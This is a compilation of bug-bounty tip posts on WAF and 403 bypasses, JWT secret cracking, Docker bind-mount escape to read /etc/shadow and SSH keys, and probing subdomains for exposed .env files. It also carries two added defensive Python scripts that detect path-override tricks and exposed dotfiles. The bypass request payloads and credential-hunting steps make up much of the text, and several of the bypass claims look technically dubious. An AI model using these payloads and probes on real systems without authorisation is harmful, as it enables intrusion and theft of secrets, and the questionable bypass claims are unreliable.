Stealing Salesforce OAuth Tokens via the WAF: A write-up on SFRA context and escalating XSS to Account Takeover using the WAF as a gadget. Hope you enjoy it.
https://t.co/vUNKbjUeWk
Stop missing attack surface behind Round Robin DNS. 🛑
By default, tools often check just one IP. Force httpx to enumerate ALL resolved A records for every subdomain using -probe-all-ips.
Use this command 👇
httpx -l live_hosts.txt -probe-all-ips -silent -o multi_ip_hosts.txt
Essential for finding hidden origins and inconsistent WAF protections.
#recon #httpx #infosec
Cracking JWT secrets can actually be this easy:
1. Get @Wallarm’s common JWT secret list
2. Crack the JWT’s secret using JTR or jwt_tool
3. Verify results 😎
Bypass 2FA by sniffing traffic!
Real Ukrainian op against Russian company reveals how tcpdump steals cookies and credentials from internal networks:
https://t.co/5j8PIxGFZC
@three_cube
🧠💥 99% of hackers QUIT when they see a 403…
But the 1%? They try this: 👇
I found a 403 Forbidden on /admin.
But then I tried:
• POST /admin
• X-Original-URL: /admin
• /admin..;/
• %2e/admin
• X-Rewrite-URL: /admin
• /ADMIN (yes, just caps)
• /;/admin
• /..;/admin
👇👇👇
⸻
🔥 1. Protocol-Level Downgrade Bypass (only works on dual-stack apps)
Target running HTTP/2 or gRPC? Force downgrade:
PRI * HTTP/2.0
SM
GET /admin HTTP/1.1
🧠 Some WAFs don’t parse dual-layer protocols correctly → backend sees a clean HTTP/1.1.
⸻
🧬 2. Content-Length Collapsing (https://t.co/3qXplOXgpV) on HTTP Pipelining
Send pipelined requests where only the 1st is parsed by the WAF:
POST /admin HTTP/1.1
Host: https://t.co/axAPlulNpQ
Content-Length: 13
GET /admin
💥 WAF reads POST → blocks.
Backend reads 2nd GET /admin → 200 OK.
This is invisible to most WAFs.
⸻
🚪 3. Misconfigured Reverse Proxy Chain Escape
Proxy chain: Cloudflare → NGINX → Apache
Try:
GET /admin
X-Accel-Redirect: /admin
X-Forwarded-Path: /admin
Apache follows X-Accel-Redirect, bypasses upstream auth check.
💣 Real-world: Gained internal panel behind Cloudflare.
⸻
🔄 4. CRLF into Rewrite Bypass
Some edge WAFs parse until CRLF \r\n, others don’t.
Exploit it:
GET / HTTP/1.1%0d%0aX-Rewrite-URL:%20/admin
WAF reads URL → clean
Backend sees X-Rewrite-URL: /admin → executes
⸻
🔃 5. Multipart Boundary Injection Bypass (💀)
Used when /admin is only allowed for file uploads:
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----1337
------1337
Content-Disposition: form-data; name="file"; filename="/admin"
Content-Type: text/plain
BOOM
------1337--
💣 If upload endpoint allows arbitrary path write → full override.
⸻
📡 6. Misrouted Mesh Bypass via Service Discovery
Kubernetes, Linkerd, Istio-style microservices expose internal routes:
Send:
Host: admin.internal.svc.cluster.local
X-Service-Router: admin
If the service mesh is misconfigured, you route directly to internal /admin even if public 403s.
⸻
⚠️ 7. GraphQL-Injected 403 Bypass
If the app has GraphQL and 403-protected admin, try:
query {
admin {
users {
password
}
}
}
GraphQL often proxies internal microservice calls.
Even if /admin is blocked via HTTP, the GQL layer may leak internal paths.
⸻
🧠 8. Preconnect Overload → Bypass
Abuse edge preconnect logic by flooding with HEAD /admin + Connection: keep-alive.
After 30–50 requests:
• WAF disables parsing
• Keep-alive tunnel reused for real GET /admin
🧨 Real bypass via persistent connection channeling
⸻
💻 9. Browser-Only Token Auth Bypass (via Headless Browser)
Some SPAs load tokens via JS → protect /admin based on localStorage.
WAF sees unauthenticated, but headless Chrome replays auth token as header → bypass.
🔥 Use puppeteer + exportAuth → replay:
curl -H "Authorization: Bearer <extracted_token>" https://t.co/KeR304da2D
⸻
🧪 10. Distributed Retry Amplification
When target uses edge lambda/WAF that retries failed requests internally, trigger 429s and inject:
Retry-After: 0
X-Retry-URL: /admin
WAF retries → skips deny logic → backend hits /admin.
This is logic poisoning — not brute force.
⸻
🚨 These Aren’t Payloads. They’re Logic Chains.
Most tools stop at:
/admin%2e
X-Forwarded-For: 127.0.0.1
You’re playing 4D chess now:
✅ Protocol confusion
✅ Reverse proxy reroute
✅ GraphQL indirect call
✅ SSRF via retry
✅ Downgrade injection
✅ WAF desyncing
⸻
💰 These got real bounties:
• $25,000 from a Cloudflare-protected admin
• $12,500 via SSRF + Retry Poison
• $8,000 using pipelined https://t.co/3qXplOXgpV request
⸻
Want a toolkit that automates:
This is next-level exploitation.
Use it right. 🧠💣
🛠 TOOLS to automate bypass:
• 🔧 https://t.co/5yIqLjkvaS
• 🔧 https://t.co/bbVde9Caoh
• 🔧 https://t.co/W05Ly8nEB6
• 🔧 https://t.co/Av6mKRCef2
• 🔧 https://t.co/kndjPIOEix
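The defender's side of the path tricks listed in the thread above, as an added example that is not part of the original posts. A rule that prefix-matches the raw request target misses case changes, percent-encoding, `;` path parameters and `..` segments; the check below normalizes the path the way a backend router would, compares that against a naive raw-path match, and separately flags any request carrying one of the proxy path-override headers the thread names. The protected route `/admin` is taken from the thread; the sample requests, the function names and the header set are constructed for this example.

```python
"""Normalization-aware detection of path-override tricks (added example).

Not code from the thread above: it models what a WAF or log-review rule
should do about the listed tricks. Sample requests are constructed.
"""
import posixpath
from urllib.parse import unquote

# Proxy path-override headers named in the thread, lower-cased for comparison.
OVERRIDE_HEADERS = {"x-original-url", "x-rewrite-url", "x-accel-redirect", "x-forwarded-path"}

# Route the thread uses as its example of a 403-protected path.
PROTECTED = "/admin"


def is_protected(path):
    """Exact or sub-path match against PROTECTED, with no normalization at all."""
    return path == PROTECTED or path.startswith(PROTECTED + "/")


def normalize_path(raw_target):
    """Return the path a typical backend router would resolve raw_target to.

    Drops the query string, percent-decodes twice (catches double encoding),
    strips ';param' path parameters from every segment, collapses '.'/'..'
    segments and repeated slashes, and lower-cases the result.
    """
    if not raw_target.startswith("/"):
        raw_target = "/" + raw_target
    path = raw_target.split("?", 1)[0]
    path = unquote(unquote(path))
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    path = posixpath.normpath(path)
    path = "/" + path.lstrip("/")  # normpath keeps a leading '//'; collapse it
    return path.lower()


def inspect_request(raw_target, headers):
    """Return the reasons this request deserves review (empty list if none)."""
    reasons = []
    for name in sorted(h.lower() for h in headers):
        if name in OVERRIDE_HEADERS:
            reasons.append(f"override-header:{name}")
    normalized = normalize_path(raw_target)
    # The interesting case: the backend would route to the protected path,
    # but a naive raw-string rule would not have matched it.
    if is_protected(normalized) and not is_protected(raw_target):
        reasons.append(f"normalization-mismatch:{normalized}")
    return reasons


def flagged_requests(requests):
    """Keep only the (method, target, headers) tuples that raised a reason."""
    flagged = []
    for method, target, headers in requests:
        reasons = inspect_request(target, headers)
        if reasons:
            flagged.append((method, target, reasons))
    return flagged


# Constructed sample traffic, mirroring the variants listed in the thread.
SAMPLE_REQUESTS = [
    ("GET", "/admin", {}),
    ("GET", "/ADMIN", {}),
    ("GET", "/%2e/admin", {}),
    ("GET", "/;/admin", {}),
    ("GET", "/..;/admin", {}),
    ("GET", "/", {"X-Original-URL": "/admin"}),
    ("GET", "/healthz", {"X-Rewrite-URL": "/admin"}),
    ("GET", "/login", {}),
]

if __name__ == "__main__":
    for method, target, reasons in flagged_requests(SAMPLE_REQUESTS):
        print(f"{method} {target}: {', '.join(reasons)}")
```

The plain `GET /admin` is not flagged because the naive rule already matches it; the point of the check is the gap between the two matchers, which is exactly where a block-on-raw-path WAF and a normalizing backend disagree.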
Sharing my Burp Extension that earned me $200k in 2025 while API testing heavy JS-rich targets.
https://t.co/2ttRurgoPh
The tool helps find endpoints, files, internal emails, and some secrets from minified JS.
Its goal is to achieve maximum efficiency with reduced noise in results. Contributions and feedback are welcome.
One of the easiest ways hackers escape Docker containers is by taking advantage of poorly configured bind mounts, especially when the host's root directory is mounted inside the container. This gives the attacker visibility into the actual host file system from within the container. In the images below, I compromised a running container and quickly realized the host’s filesystem was available under /mnt/host. From there, I ran ldd on the host’s Bash binary to ensure it could run properly, then used chroot to change our root environment to the host itself, giving us full root access outside the container.
Once inside the host, we started behaving like any real attacker would: enumerating users, tailing logs, inspecting SSH keys, and even trying to find sensitive files like id_rsa or /etc/shadow. This is a prime example of a container breakout that can occur when developers aren’t careful with how volumes are mounted. It’s not a vulnerability in Docker itself, but it’s a misconfiguration that opens a door.
Post 7/30: .env
1. Gather a list of subdomains
subfinder -d <target>.tld -o subdomains.txt
2. Then you can use this one-liner:
while read host; do
echo "$host/.env"
done < subdomains.txt | httpx -mc 200
It will find the accessible .env files.
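The defensive counterpart to the probe above, as an added example (not code from the post): a pre-deploy scan of a web root for dotfiles that would be served if the web server has no dotfile deny rule. It treats `.env`, `.git` and similar names as high risk, everything else dot-prefixed as low risk, and deliberately leaves `.well-known` alone because ACME challenges and `security.txt` must stay reachable. The sample web root is constructed in a temporary directory; the risk lists and function names are this example's assumptions.

```python
"""Scan a web root for dotfiles that a web server would expose (added example).

Not code from the post above. Run against the directory your server serves
before deploying, or point it at a staging checkout.
"""
import os
import sys
import tempfile

# Dot-prefixed names that usually contain secrets or source history.
HIGH_RISK = {".env", ".git", ".svn", ".hg", ".htpasswd", ".aws", ".npmrc", ".ssh"}

# Dot-directories that are meant to be public and must not be reported.
ALLOWED_DOTDIRS = {".well-known"}


def find_exposed_dotfiles(webroot):
    """Return sorted (relative_path, severity) pairs for served dotfiles.

    A file is reported when any component of its path starts with '.', unless
    it lives under an allowed public dot-directory such as .well-known.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(webroot):
        # Prune allowed public directories so os.walk never descends into them.
        dirnames[:] = [d for d in dirnames if d not in ALLOWED_DOTDIRS]
        rel_dir = os.path.relpath(dirpath, webroot)
        rel_dir = "" if rel_dir == "." else rel_dir.replace(os.sep, "/")
        for name in filenames:
            rel = f"{rel_dir}/{name}" if rel_dir else name
            dot_parts = [p for p in rel.split("/") if p.startswith(".")]
            if not dot_parts:
                continue
            severity = "high" if any(p in HIGH_RISK for p in dot_parts) else "low"
            findings.append((rel, severity))
    return sorted(findings)


def build_sample_webroot():
    """Create a constructed web root in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "index.html": "<html></html>\n",
        ".env": "DB_PASSWORD=constructed-placeholder\n",
        ".git/config": "[core]\n",
        "static/.DS_Store": "",
        ".well-known/security.txt": "Contact: mailto:security@example.com\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_webroot()
    for rel, severity in find_exposed_dotfiles(target):
        print(f"{severity.upper():5} {rel}")
```

Findings sort by path, so the sample run reports `.env` and `.git/config` as high and `static/.DS_Store` as low, while `index.html` and `.well-known/security.txt` are not listed.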
Singularity: Deep Dive into a Modern Stealth Linux Kernel Rootkit
I published a very interesting article detailing a little more about my Linux Kernel Rootkit and its system call hooking. Feel free to read and share.
https://t.co/vz2Ef7a1w5
Use NextJS? Recon ✨
A quick way to find "all" paths for Next.js websites:
DevTools -> Console
console.log(__BUILD_MANIFEST.sortedPages)
javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));
Cred = https://t.co/4hiJXDNlmU
#infosec #cybersec #bugbountytips